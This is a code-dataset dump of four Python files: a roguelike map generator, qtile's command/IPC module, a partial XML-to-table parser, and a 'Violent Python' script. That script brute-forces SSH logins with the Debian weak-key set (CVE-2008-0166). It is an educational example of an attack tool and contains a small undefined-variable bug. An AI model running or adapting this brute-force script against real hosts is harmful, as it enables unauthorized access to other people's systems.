repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
abeing/droog
|
droog/world.py
|
1
|
26187
|
# -*- coding: UTF-8 -*-
# Droog
# Copyright (C) 2015 Adam Miezianko
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""The Droog module for handling the world.
Location -- A class for value objects storing coordinates in the world.
World -- A class for reference objects of the World itself.
"""
import random
import logging
import math
from . import tile
from . import engine
from . import english
from . import the
LOG = logging.getLogger(__name__)
TREE_CHANCE = 0.05
ROAD_GRID_SIZE = 24
ROAD_CHANCE = 0.5
BUILDING_CHANCE = 0.42
WALL_BREAK_CHANCE = 0.12
mult = [[1, 0, 0, -1, -1, 0, 0, 1],
[0, 1, -1, 0, 0, -1, 1, 0],
[0, 1, 1, 0, 0, -1, -1, 0],
[1, 0, 0, 1, -1, 0, 0, -1]]
class Location(object):
"""The Location class represents a position on a grid."""
def __init__(self, row, col):
"""Construct a new location."""
self.row = row
self.col = col
def offset(self, delta_row, delta_col):
"""Offset the location by a given number of rows and columns."""
return Location(self.row + delta_row, self.col + delta_col)
def distance_to(self, other_loc):
"""Return the distance between another location and this one."""
delta_row = abs(other_loc.row - self.row)
delta_col = abs(other_loc.col - self.col)
return math.sqrt(delta_row * delta_row + delta_col * delta_col)
def delta_to(self, other_loc):
"""Return a delta between the other_loc and this one."""
if other_loc.row == self.row:
delta_row = 0
else:
delta_row = 1 if (other_loc.row - self.row > 0) else -1
if other_loc.col == self.col:
delta_col = 0
else:
delta_col = 1 if (other_loc.col - self.col > 0) else -1
return Location(delta_row, delta_col)
def __repr__(self):
"""Return string representation."""
return "(%r, %r)" % (self.row, self.col)
def __eq__(self, other):
"""Return True if these have the same value."""
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
else:
return False
def __ne__(self, other):
"""Return True if these do not have the same value."""
return not self.__eq__(other)
def random_delta():
"""Return a random delta."""
return Location(random.choice([-1, 0, 1]), random.choice([-1, 0, 1]))
class World(object):
"""Representation of the game world."""
def __init__(self, rows, cols):
"""Creates a World of the specified width, height, number of roads and
probability of intersection continuations.
The world is a grid of streets with the hero in the center.
"""
assert rows > 20
assert cols > 20
self.cols = cols
self.rows = rows
self.tiles = []
self.generator = engine.Generator()
self.generator_location = None
# The junction grid used to make this map, for logging and debugging.
self._junction_grid = None
for row in range(rows):
self.tiles.append(list())
for _ in range(cols):
self.tiles[row].append(tile.make_empty())
self.hero_location = self._position_hero()
self.cell(self.hero_location).creature = the.hero
self._generate()
self.do_fov()
self.visible_monsters = []
self.monster_count = 0
self.dead_monsters = []
def is_empty(self, loc):
"""Returns True if the location is empty."""
return self.cell(loc).transparent
def is_valid_location(self, loc):
"""Return true if this location is in the world bounds."""
return 0 <= loc.row < self.rows and 0 <= loc.col < self.cols
def cell(self, loc):
"""Return the tile at the location."""
return self.tiles[loc.row][loc.col]
def size_in_tiles(self):
"""Return the size of the world in tiles."""
return self.rows * self.cols
def indoor_walkable_locations(self):
"""Return a list of Locations that are indoors."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def outdoor_walkable_locations(self):
"""Return a list of Locations that are outside and walkable."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if not self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def glyph_at(self, loc):
"""Returns the world glyph and its color at the specified location. If
the location coordinates are out of bounds, returns a shield character.
"""
if loc == self.hero_location:
return '@'
cell = self.cell(loc)
if cell.creature:
return cell.creature.glyph
if cell.items:
return cell.items[0].glyph
return cell.glyph
def description_at(self, loc):
"""Return a description of the location specified.
The description of a map location is description of the first of the
following elements at that location: monster, item, tile.
If the location is invalid, the empty string is returned.
"""
if loc == self.hero_location:
return "yourself"
if self.cell(loc).creature:
return english.indefinite_creature(self.cell(loc).creature)
if self.cell(loc).items:
return self.item_description_at(loc)
else:
return self.cell(loc).description
def item_description_at(self, loc):
"""Return a description of the items at a location."""
items_msg = ""
items = self.cell(loc).items
if items:
items_msg = "%s" % items[0].name
if len(items) > 1:
items_msg += " amongst other things."
else:
items_msg += "."
return items_msg
def move_creature(self, from_loc, delta):
"""Move a creature or hero at (y, x) by (delta_y, delta_x) and return
the action point costs of the movement or zero if the movement was not
possible.
At the moment, only single-step movement is permitted as we do not have
pathfinding implemented."""
assert delta.row < 2
assert delta.col < 2
to_loc = from_loc.offset(delta.row, delta.col)
if self.cell(to_loc).walkable:
moved_creature = self.cell(from_loc).creature
LOG.info('Moved creature %r from %r to %r', moved_creature.name,
from_loc, to_loc)
moved_creature.loc = to_loc
self.cell(from_loc).creature = None
self.cell(to_loc).creature = moved_creature
return engine.movement_cost(delta.row, delta.col)
return 0
def change_hero_loc(self, new_loc):
"""Change the hero location."""
old_loc = self.hero_location
self.hero_location = new_loc
self.cell(old_loc).creature = None
self.cell(new_loc).creature = the.hero
self.do_fov()
def move_hero(self, delta_y, delta_x):
"""Move the hero by (delta_y, delta_x)."""
old_loc = self.hero_location
new_loc = self.hero_location.offset(delta_y, delta_x)
if self.cell(new_loc).walkable:
LOG.info('Moved hero from %r to %r', old_loc, new_loc)
self.change_hero_loc(new_loc)
# If there are items in the new location, report about them in the
# message LOG.
items_msg = self.item_description_at(new_loc)
if items_msg:
the.messages.add("You see here %s" % items_msg)
return engine.movement_cost(delta_y, delta_x)
target = self.cell(new_loc).creature
if target:
return the.hero.melee_attack(target)
# If we have a shield generator, we begin to jurry rig it.
if self.glyph_at(new_loc) == 'G':
return self.generator.deactivate()
return 0
def _position_hero(self):
"""Calculates the location for the hero.
The hero will start in the other ring of the map."""
rand_dist = random.uniform(self.cols / 4, self.cols / 2 - 1)
rand_dir = random.uniform(0, 359)
row = int(rand_dist * math.sin(rand_dir)) + self.rows / 2
col = int(rand_dist * math.cos(rand_dir)) + self.cols / 2
the.hero.loc = Location(row, col)
LOG.debug("Hero starts at %r.", the.hero.loc)
return Location(row, col)
def add_road(self, start_loc, delta_y, delta_x, beta):
"""Adds a road to the map
Starting at (start_y, start_x) and heading in a direction specified by
delta_y and delta_x, draw a map until we reach the edge of the map. If
we run into another road, continue with probability beta, otherwise
stop."""
assert delta_y * delta_x == 0, 'We only support orthogonal roads.'
keep_going = True
road_loc = start_loc
while self.is_valid_location(road_loc) and keep_going:
self.tiles[road_loc.row][road_loc.col] = tile.make_street()
road_loc = road_loc.offset(delta_y, delta_x)
if self.is_valid_location(road_loc) \
and self.cell(road_loc).glyph == '#':
keep_going = random.uniform(0, 1) < beta
def _log(self):
"""Dumps the world into a file called 'world.dump'"""
with open("world.dump", "w") as dump_file:
for row in self._junction_grid:
dump_file.write("%r" % row)
for row in range(self.rows):
for col in range(self.cols):
dump_file.write(self.cell(Location(row, col)).glyph)
dump_file.write("\n")
def random_empty_location(self, near=None, attempts=5, radius=10):
"""Creates a random location on the map, or a random location on the
map near a specified location."""
while attempts > 0:
if near is None:
row = int(random.uniform(0, self.rows))
col = int(random.uniform(0, self.cols))
else:
row = int(random.triangular(low=near.row - radius,
high=near.row + radius))
col = int(random.triangular(low=near.col - radius,
high=near.col + radius))
loc = Location(row, col)
if self.is_valid_location(loc) and \
self.cell(loc).creature is None and self.cell(loc).walkable:
return loc
attempts -= 1
return None
def teleport_hero(self, near):
"""Teleports the hero to a valid location near a specified location."""
new_loc = self.random_empty_location(near)
self.change_hero_loc(new_loc)
def attempt_to_place_monster(self, monster, near=None, hidden=False):
"""Spawns a monster on the map.
The monster should already be created, place_monster only attempts to
find a suitable location on the map and place it. If a suitable
location cannot be found in one attempt, it returns False.
monster - the monster to add to the map
near - a location near which to place the monster, or None if anywhere
in the world is elligible
hidden - whether to exclude locations visible to the hero
"""
assert monster
location = self.random_empty_location(near)
if location is None:
return False
if self.cell(location).seen and hidden:
return False
if monster is not None:
the.turn.add_actor(monster)
monster.loc = location
self.cell(location).creature = monster
LOG.info('%r placed at %r', monster, location)
self.monster_count += 1
return True
def remove_monster(self, monster):
"""Removes a monster from the map, for example when it dies."""
self.visible_monsters.remove(monster)
self.tiles[monster.loc.row][monster.loc.col].creature = None
self.monster_count -= 1
self.dead_monsters.append(monster)
def add_item(self, loc, item):
"""Add an item to a location."""
assert self.is_valid_location(loc)
self.cell(loc).items.append(item)
def get_item(self, loc):
"""Get an item from the world."""
assert self.is_valid_location(loc)
item = None
if self.cell(loc).items:
item = self.cell(loc).items.pop()
return item
def set_lit(self, loc):
"""Set the cell at loc as visible."""
self.cell(loc).seen = True
monster = self.cell(loc).creature
if monster and monster not in self.visible_monsters:
self.visible_monsters.append(monster)
def _cast_light(self, cx, cy, row, start, end, radius, xx, xy, yx, yy):
"Recursive lightcasting function"
if start < end:
return
radius_squared = radius*radius
for j in range(row, radius+1):
dx, dy = -j-1, -j
blocked = False
while dx <= 0:
dx += 1
# Translate the dx, dy coordinates into map coordinates:
X, Y = cx + dx * xx + dy * xy, cy + dx * yx + dy * yy
# l_slope and r_slope store the slopes of the left and right
# extremities of the square we're considering:
l_slope, r_slope = (dx-0.5)/(dy+0.5), (dx+0.5)/(dy-0.5)
loc = Location(Y, X)
if not self.is_valid_location(loc):
return
if start < r_slope:
continue
elif end > l_slope:
break
else:
# Our light beam is touching this square; light it:
if dx*dx + dy*dy < radius_squared:
self.set_lit(loc)
if blocked:
# we're scanning a row of blocked squares:
if not self.is_empty(loc):
new_start = r_slope
continue
else:
blocked = False
start = new_start
else:
if not self.is_empty(loc) and j < radius:
# This is a blocking square, start a child scan:
blocked = True
self._cast_light(cx, cy, j+1, start, l_slope,
radius, xx, xy, yx, yy)
new_start = r_slope
# Row is scanned; do next row unless last square was blocked:
if blocked:
break
def reset_fov(self):
"""Reset the field of view data for the map."""
for row in xrange(self.rows):
for col in xrange(self.cols):
self.tiles[row][col].seen = False
self.visible_monsters = []
def do_fov(self):
"Calculate lit squares from the given location and radius"
self.reset_fov()
for octant in range(8):
self._cast_light(self.hero_location.col, self.hero_location.row,
1, 1.0, 0.0, 10,
mult[0][octant], mult[1][octant],
mult[2][octant], mult[3][octant])
def _generate(self):
"""Generate the world map.
This function builds the world in several stages.
1) Generate grasses, bushes and trees.
2) Generate the road grid.
3) Build the fortress.
4) Build the other buildings and a lake.
"""
self._generate_vegetation()
self._generate_roads()
self._generate_computer()
self._generate_shield()
self._generate_buildings()
def _generate_vegetation(self):
"""Fill the map with vegeation."""
for row in xrange(0, self.rows):
for col in xrange(0, self.cols):
if TREE_CHANCE > random.random():
self.tiles[row][col] = tile.make_tree()
else:
self.tiles[row][col] = tile.make_empty()
def _generate_roads(self):
"""Fill the map with a grid of roads."""
junction_grid = _create_junction_grid(self.rows, self.cols,
ROAD_GRID_SIZE)
self._junction_grid = junction_grid # for dumping purposes
prev_road_row = 0
road_row = ROAD_GRID_SIZE
prev_road_col = 0
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
LOG.debug("Drawing junction %r", junction)
if junction[0]: # North road
LOG.debug("Drawing north road from row %d to row %d in "
"col %d", prev_road_row, road_row, road_col)
extended_prev_road_row = prev_road_row - 3
if extended_prev_road_row < 0:
extended_prev_road_row = 0
for row in xrange(extended_prev_road_row, road_row):
if self.tiles[row][road_col - 5].glyph != '*':
self.tiles[row][road_col - 5] = tile.make_empty()
if self.tiles[row][road_col - 4].glyph != '*':
self.tiles[row][road_col - 4] = tile.make_empty()
self.tiles[row][road_col - 3] = tile.make_street()
self.tiles[row][road_col - 2] = tile.make_street()
self.tiles[row][road_col - 1] = tile.make_street()
if road_col < self.cols - 1 \
and self.tiles[row][road_col].glyph != '*':
self.tiles[row][road_col + 0] = tile.make_empty()
if road_col < self.cols - 2 \
and self.tiles[row][road_col + 1].glyph != '*':
self.tiles[row][road_col + 1] = tile.make_empty()
if junction[3]: # West road
LOG.debug("Drawing west road from col %d to col %d in "
"row %d", prev_road_col, road_col, road_row)
for col in xrange(prev_road_col, road_col):
if self.tiles[road_row - 5][col].glyph != '*':
self.tiles[road_row - 5][col] = tile.make_empty()
if self.tiles[road_row - 4][col].glyph != '*':
self.tiles[road_row - 4][col] = tile.make_empty()
self.tiles[road_row - 3][col] = tile.make_street()
self.tiles[road_row - 2][col] = tile.make_street()
self.tiles[road_row - 1][col] = tile.make_street()
if road_row < self.rows - 1 \
and self.tiles[road_row][col].glyph != '*':
self.tiles[road_row][col] = tile.make_empty()
if road_row < self.rows - 2 \
and self.tiles[road_row + 1][col].glyph != '*':
self.tiles[road_row + 1][col] = tile.make_empty()
prev_road_col = road_col
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
prev_road_row = road_row
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
prev_road_col = 0
road_col = ROAD_GRID_SIZE
road_row = ROAD_GRID_SIZE
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
if not junction[0] and not junction[3]:
self.tiles[road_row - 3][road_col - 3] = tile.make_empty()
if not junction[2] and not junction[3]:
self.tiles[road_row - 1][road_col - 3] = tile.make_empty()
if not junction[1] and not junction[2]:
self.tiles[road_row - 1][road_col - 1] = tile.make_empty()
if not junction[0] and not junction[1]:
self.tiles[road_row - 3][road_col - 1] = tile.make_empty()
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
road_col = ROAD_GRID_SIZE
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
def _generate_computer(self):
"""Places a shield generator in the center of the map."""
row = self.rows / 2
col = self.cols / 2
self.generator_location = Location(row, col)
self.tiles[row][col] = tile.make_shield_generator()
def _generate_shield(self):
"""Creates the shield border around the navigable map."""
for row in range(0, self.rows):
self.tiles[row][0] = tile.make_shield()
self.tiles[row][self.cols - 1] = tile.make_shield()
for col in range(self.cols):
self.tiles[0][col] = tile.make_shield()
self.tiles[self.rows - 1][col] = tile.make_shield()
def _generate_buildings(self):
"""Create buildings in some blocks."""
cell_begin_row = 0
cell_end_row = ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
while cell_end_row < self.rows:
while cell_end_col < self.cols:
if random.random() < BUILDING_CHANCE:
begin = Location(cell_begin_row, cell_begin_col)
end = Location(cell_end_row, cell_end_col)
self._generate_building(begin, end)
cell_begin_col = cell_end_col
cell_end_col += ROAD_GRID_SIZE
cell_begin_row = cell_end_row
cell_end_row += ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
def _generate_building(self, begin, end):
"""Create a building at the sepcified site."""
LOG.debug("Generating a building between %r and %r.", begin, end)
top = begin.row + random.randint(3, ROAD_GRID_SIZE / 3)
bottom = end.row - random.randint(6, ROAD_GRID_SIZE / 3)
left = begin.col + random.randint(3, ROAD_GRID_SIZE / 3)
right = end.col - random.randint(6, ROAD_GRID_SIZE / 3)
for row in xrange(top, bottom + 1):
for col in xrange(left, right + 1):
if row == top or row == bottom or col == left or col == right:
if WALL_BREAK_CHANCE < random.random():
self.tiles[row][col] = tile.make_wall()
else:
self.tiles[row][col] = tile.make_floor()
def _generate_random_junction(north, south, east, west):
"""Generate random junction given which roads much or must not exist.
For north, south, east, and west True means road must exist, False means
road must not exist, and None means either is okay.
"""
result = [north, south, east, west]
free_roads = []
for index in xrange(4):
if result[index] is None:
free_roads.append(index)
free_road_count = len(free_roads)
fill_road_count = 0
for _ in xrange(free_road_count):
fill_road_count += random.random() < ROAD_CHANCE
while fill_road_count > 0:
fill_road = random.choice(free_roads)
result[fill_road] = True
free_roads.remove(fill_road)
fill_road_count -= 1
road_count = 0
for road in result:
if road is True:
road_count += 1
if road_count == 1:
fill_road = random.choice(free_roads)
free_roads.remove(fill_road)
result[fill_road] = True
while free_roads:
fill_road = free_roads.pop()
result[fill_road] = False
return result
def _log_junction_grid(grid):
"""Writes the junction grid out to the log."""
LOG.debug("Junction grid")
for row in grid:
LOG.debug(row)
def _create_junction_grid(map_rows, map_cols, cell_size):
"""Create a grid of valid road intersations."""
assert cell_size < map_rows
assert cell_size < map_cols
junction_grid = []
rows = map_rows / cell_size
cols = map_cols / cell_size
LOG.debug("Creating junction grid of size %d rows by %d columns. cell"
" size is %d", rows, cols, cell_size)
for row in xrange(0, rows):
junction_grid.append([])
for col in xrange(0, cols):
north = junction_grid[row - 1][col][2] if row > 0 else None
west = junction_grid[row][col - 1][1] if col > 0 else None
junction = _generate_random_junction(north, None, None, west)
junction_grid[row].append(junction)
return junction_grid
|
gpl-2.0
| 4,446,171,767,116,297,000
| 39.041284
| 79
| 0.543743
| false
| 3.848765
| false
| false
| false
|
QuintilianoB/Violent-Python-examples
|
Chapter 2/5.debianSshWeakPK.py
|
1
|
3380
|
# SSH brute force with pxssh class and keyfile, based on chapter 2
# Python 3.4
"""
Another example of this script: https://www.exploit-db.com/exploits/5720/
The 32768 keys can be found here: https://github.com/g0tmi1k/debian-ssh
The exploit CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166
For this works, you must have a Debian distro with an vulnerable version of Openssl.
I've tested it with version 0.9.8g
Download links:
1 Ubuntu pkg- https://launchpad.net/ubuntu/+source/openssl/0.9.8b-2ubuntu2.1
2 Source - https://www.openssl.org/source/old/0.9.x/openssl-0.9.8b.tar.gz
"""
import pexpect
import argparse
import os
import threading
maxConnections = 5
connection_lock = threading.BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
# Defines what pexpect should expect as return.
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
# SSH connection with keyfile instead of password. If no keyfile is sent, there will be no connection.
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i' + keyfile + opt
# Starts a connections and reads the return.
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied,ssh_newkey, conn_closed, '$', '#'])
if ret == 2:
print("[-] Adding host to know_host file")
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print("[-] {0}.".format(conn_closed))
Fails += 1
elif ret > 3:
print("[+] Success. {0}".format(str(keyfile)))
Stop = True
finally:
# After succeed on trying connection, releases the lock from resource.
if release:
connection_lock.release()
def main():
# Defines the options and the help menu.
parser = argparse.ArgumentParser(description="Simple Python SSH Brute Force with keyfile")
parser.add_argument('Target', help="Target host.")
parser.add_argument('User', help="User for ssh connection.")
parser.add_argument('KeyDir', help="Directory with private keyfiles for connection.")
# Receives the arguments sent by the user.
args = parser.parse_args()
tgtHost = args.Target
user = args.User
keyDir = args.KeyDir
# If anything is not set , prints the help menu from argparse and exits.
if tgtHost == None or user == None or keyDir == None:
print(parser.usage)
exit(0)
for keyfile in os.listdir(keyDir):
if Stop:
print("[*] Key found. Exiting.")
exit(0)
if Fails > 5:
print("[!] Too many connection errors. Exiting.")
exit(0)
connection_lock.acquire()
# Receives the keyfile's location and joins it with the file name for a complete path.
fullpath = os.path.join(keyDir, keyfile)
print("[-] Testing key: {0}".format(str(fullpath)))
# Defines and starts the thread.
bruteforce = threading.Thread(target=connect, args=(user, host, fullpath, True))
child = bruteforce.start()
if __name__ == '__main__':
main()
|
gpl-2.0
| -930,355,457,819,945,000
| 30.598131
| 110
| 0.633728
| false
| 3.806306
| false
| false
| false
|
Fxrh/tispa-wm
|
libqtile/command.py
|
1
|
12105
|
# Copyright (c) 2008, Aldo Cortesi. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import inspect
import traceback
import textwrap
import os
import ipc
class CommandError(Exception):
pass
class CommandException(Exception):
pass
class _SelectError(Exception):
def __init__(self, name, sel):
Exception.__init__(self)
self.name, self.sel = name, sel
SUCCESS = 0
ERROR = 1
EXCEPTION = 2
SOCKBASE = "qtilesocket.%s"
def formatSelector(lst):
"""
Takes a list of (name, sel) tuples, and returns a formatted
selector expression.
"""
expr = []
for i in lst:
if expr:
expr.append(".")
expr.append(i[0])
if i[1] is not None:
expr.append("[%s]" % repr(i[1]))
return "".join(expr)
class _Server(ipc.Server):
def __init__(self, fname, qtile, conf):
if os.path.exists(fname):
os.unlink(fname)
ipc.Server.__init__(self, fname, self.call)
self.qtile = qtile
self.widgets = {}
for i in conf.screens:
for j in i.gaps:
if hasattr(j, "widgets"):
for w in j.widgets:
if w.name:
self.widgets[w.name] = w
def call(self, data):
selectors, name, args, kwargs = data
try:
obj = self.qtile.select(selectors)
except _SelectError, v:
e = formatSelector([(v.name, v.sel)])
s = formatSelector(selectors)
return ERROR, "No object %s in path '%s'" % (e, s)
cmd = obj.command(name)
if not cmd:
return ERROR, "No such command."
self.qtile.log.info("Command: %s(%s, %s)" % (name, args, kwargs))
try:
return SUCCESS, cmd(*args, **kwargs)
except CommandError, v:
return ERROR, v.args[0]
except Exception, v:
return EXCEPTION, traceback.format_exc()
self.qtile.conn.flush()
class _Command:
def __init__(self, call, selectors, name):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.call = call
def __call__(self, *args, **kwargs):
return self.call(self.selectors, self.name, *args, **kwargs)
class _CommandTree(object):
"""
A CommandTree a hierarchical collection of command objects.
CommandTree objects act as containers, allowing them to be nested. The
commands themselves appear on the object as callable attributes.
"""
def __init__(self, call, selectors, myselector, parent):
self.call = call
self.selectors = selectors
self.myselector = myselector
self.parent = parent
@property
def path(self):
s = self.selectors[:]
if self.name:
s += [(self.name, self.myselector)]
return formatSelector(s)
def __getitem__(self, select):
if self.myselector:
raise KeyError("No such key: %s" % select)
c = self.__class__(self.call, self.selectors, select, self)
return c
def __getattr__(self, name):
nextSelector = self.selectors[:]
if self.name:
nextSelector.append((self.name, self.myselector))
if name in self._contains:
return _TreeMap[name](self.call, nextSelector, None, self)
else:
return _Command(self.call, nextSelector, name)
class _TLayout(_CommandTree):
name = "layout"
_contains = ["group", "window", "screen"]
class _TWidget(_CommandTree):
name = "widget"
_contains = ["bar", "screen", "group"]
class _TBar(_CommandTree):
name = "bar"
_contains = ["screen"]
class _TWindow(_CommandTree):
name = "window"
_contains = ["group", "screen", "layout"]
class _TScreen(_CommandTree):
name = "screen"
_contains = ["layout", "window", "bar"]
class _TGroup(_CommandTree):
name = "group"
_contains = ["layout", "window", "screen"]
_TreeMap = {
"layout": _TLayout,
"widget": _TWidget,
"bar": _TBar,
"window": _TWindow,
"screen": _TScreen,
"group": _TGroup,
}
class _CommandRoot(_CommandTree):
name = None
_contains = ["layout", "widget", "screen", "bar", "window", "group"]
def __init__(self):
"""
This method constructs the entire hierarchy of callable commands
from a conf object.
"""
_CommandTree.__init__(self, self.call, [], None, None)
def __getitem__(self, select):
raise KeyError("No such key: %s" % select)
def call(self, selectors, name, *args, **kwargs):
"""
This method is called for issued commands.
:selectors A list of (name, selector) tuples.
:name Command name.
"""
pass
def find_sockfile(display=None):
"""
Finds the appropriate socket file.
"""
if not display:
display = os.environ.get("DISPLAY")
if not display:
display = ":0.0"
if '.' not in display:
display += '.0'
cache_directory = os.path.expandvars('$XDG_CACHE_HOME')
if cache_directory == '$XDG_CACHE_HOME':
# if variable wasn't set
cache_directory = os.path.expanduser("~/.cache")
if not os.path.exists(cache_directory):
os.makedirs(cache_directory)
return os.path.join(cache_directory, SOCKBASE % display)
class Client(_CommandRoot):
"""
Exposes a command tree used to communicate with a running instance of
Qtile.
"""
def __init__(self, fname=None):
if not fname:
fname = find_sockfile()
self.client = ipc.Client(fname)
_CommandRoot.__init__(self)
def call(self, selectors, name, *args, **kwargs):
state, val = self.client.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class CommandRoot(_CommandRoot):
def __init__(self, qtile):
self.qtile = qtile
super(CommandRoot, self).__init__()
def call(self, selectors, name, *args, **kwargs):
state, val = self.qtile.server.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class _Call:
def __init__(self, selectors, name, *args, **kwargs):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.args, self.kwargs = args, kwargs
# Conditionals
self.layout = None
def when(self, layout=None):
self.layout = layout
return self
def check(self, q):
if self.layout and q.currentLayout.name != self.layout:
return False
return True
class _LazyTree(_CommandRoot):
def call(self, selectors, name, *args, **kwargs):
return _Call(selectors, name, *args, **kwargs)
lazy = _LazyTree()
class CommandObject(object):
"""
Base class for objects that expose commands. Each command should be a
method named cmd_X, where X is the command name.
"""
def select(self, selectors):
if not selectors:
return self
name, sel = selectors[0]
selectors = selectors[1:]
r = self.items(name)
if (r is None) or\
(r[1] is None and sel is not None) or\
(r[1] is not None and sel and sel not in r[1]) or\
(r[0] is False and sel is None):
raise _SelectError(name, sel)
obj = self._select(name, sel)
if obj is None:
raise _SelectError(name, sel)
return obj.select(selectors)
def items(self, name):
"""
Returns a list of contained items for this name.
"""
ret = self._items(name)
if ret is None:
raise CommandError("Unknown item class: %s" % name)
return ret
def _items(self, name):
"""
Return (root, items) tuple for the specified item class, with:
root: True if this class accepts a "naked" specification
without an item specification (i.e. "layout"), and False if it
does not.
items is a list of contained items, or None if this object is
not a valid container.
Return None if name is not a valid item class.
"""
raise NotImplementedError
def _select(self, name, sel, selectors):
"""
Return a selected object, or None if no such object exists.
This method is called with the following guarantees:
- name is a valid selector class for this item
- sel is a valid selector for this item
- the name, sel tuple is not an "impossible" combination (e.g.
a selector is specified when this is not a containment
object).
"""
raise NotImplementedError
def command(self, name):
return getattr(self, "cmd_" + name, None)
def commands(self):
lst = []
for i in dir(self):
if i.startswith("cmd_"):
lst.append(i[4:])
return lst
def cmd_commands(self):
"""
Returns a list of possible commands for this object.
Used by __qsh__ for command completion and online help.
"""
return self.commands()
def cmd_items(self, name):
"""
Returns a list of contained items for the specified name. Used by
__qsh__ to allow navigation of the object graph.
"""
return self.items(name)
def docSig(self, name):
args, varargs, varkw, defaults = inspect.getargspec(self.command(name))
if args and args[0] == "self":
args = args[1:]
return name + inspect.formatargspec(args, varargs, varkw, defaults)
def docText(self, name):
return textwrap.dedent(self.command(name).__doc__ or "")
def doc(self, name):
spec = self.docSig(name)
htext = self.docText(name)
htext = "\n".join([i for i in htext.splitlines()])
return spec + htext
def cmd_doc(self, name):
"""
Returns the documentation for a specified command name. Used by
__qsh__ to provide online help.
"""
if name in self.commands():
return self.doc(name)
else:
raise CommandError("No such command: %s" % name)
|
gpl-3.0
| -735,328,225,687,440,100
| 29.11194
| 79
| 0.581
| false
| 4.108961
| false
| false
| false
|
sillygod/my-travel-in-learning-python
|
databaseProject/DataBase.py
|
1
|
2520
|
'''
FUNC: read a xml file(database) and transfer it to a list of dictionary type
note: no case sensitive
I will make a rule about the database in xml form
ex.
____________________________
Student |name | ID | score | and ID is a key
|aa | 1 | 10 |
|bb | 2 | 20 |
in XML file, I will use something like the following.
<table name='Student'>
<data>
<name>aa</name>
<ID key='key'>1</ID>
<score>10</score>
</data>
<data>
<name>bb</name>
<ID key='key'>2</ID>
<score>20</score>
</data>
</table>
table data type: a dict contain a dict of list ex. dict[{}:[{}]]
'''
try:
import xml.etree.cElementTree as eTree
except ImportError:
import xml.etree.ElementTree as eTree
# the above, try to find the api implemented by C because of the speed consideration
# but in python3.3, you just type import xml.etree.ElementTree. it will automatically to find the best
class DataBase:
def __init__(self, fileName):
self.Table = {}
self.Tree = eTree.parse(fileName)
self.createTable()
def createTable(self):
''' start to traverse '''
for elem in self.Tree.iter(tag='table'):
tableName=elem.attrib['name'].upper()
self.Table[tableName] = [] # make a table
for data in elem: # enter the each data of table
rowAttribute={} # make a new dict
for attribute in data:
rowAttribute[attribute.tag.upper()]=attribute.text.upper()
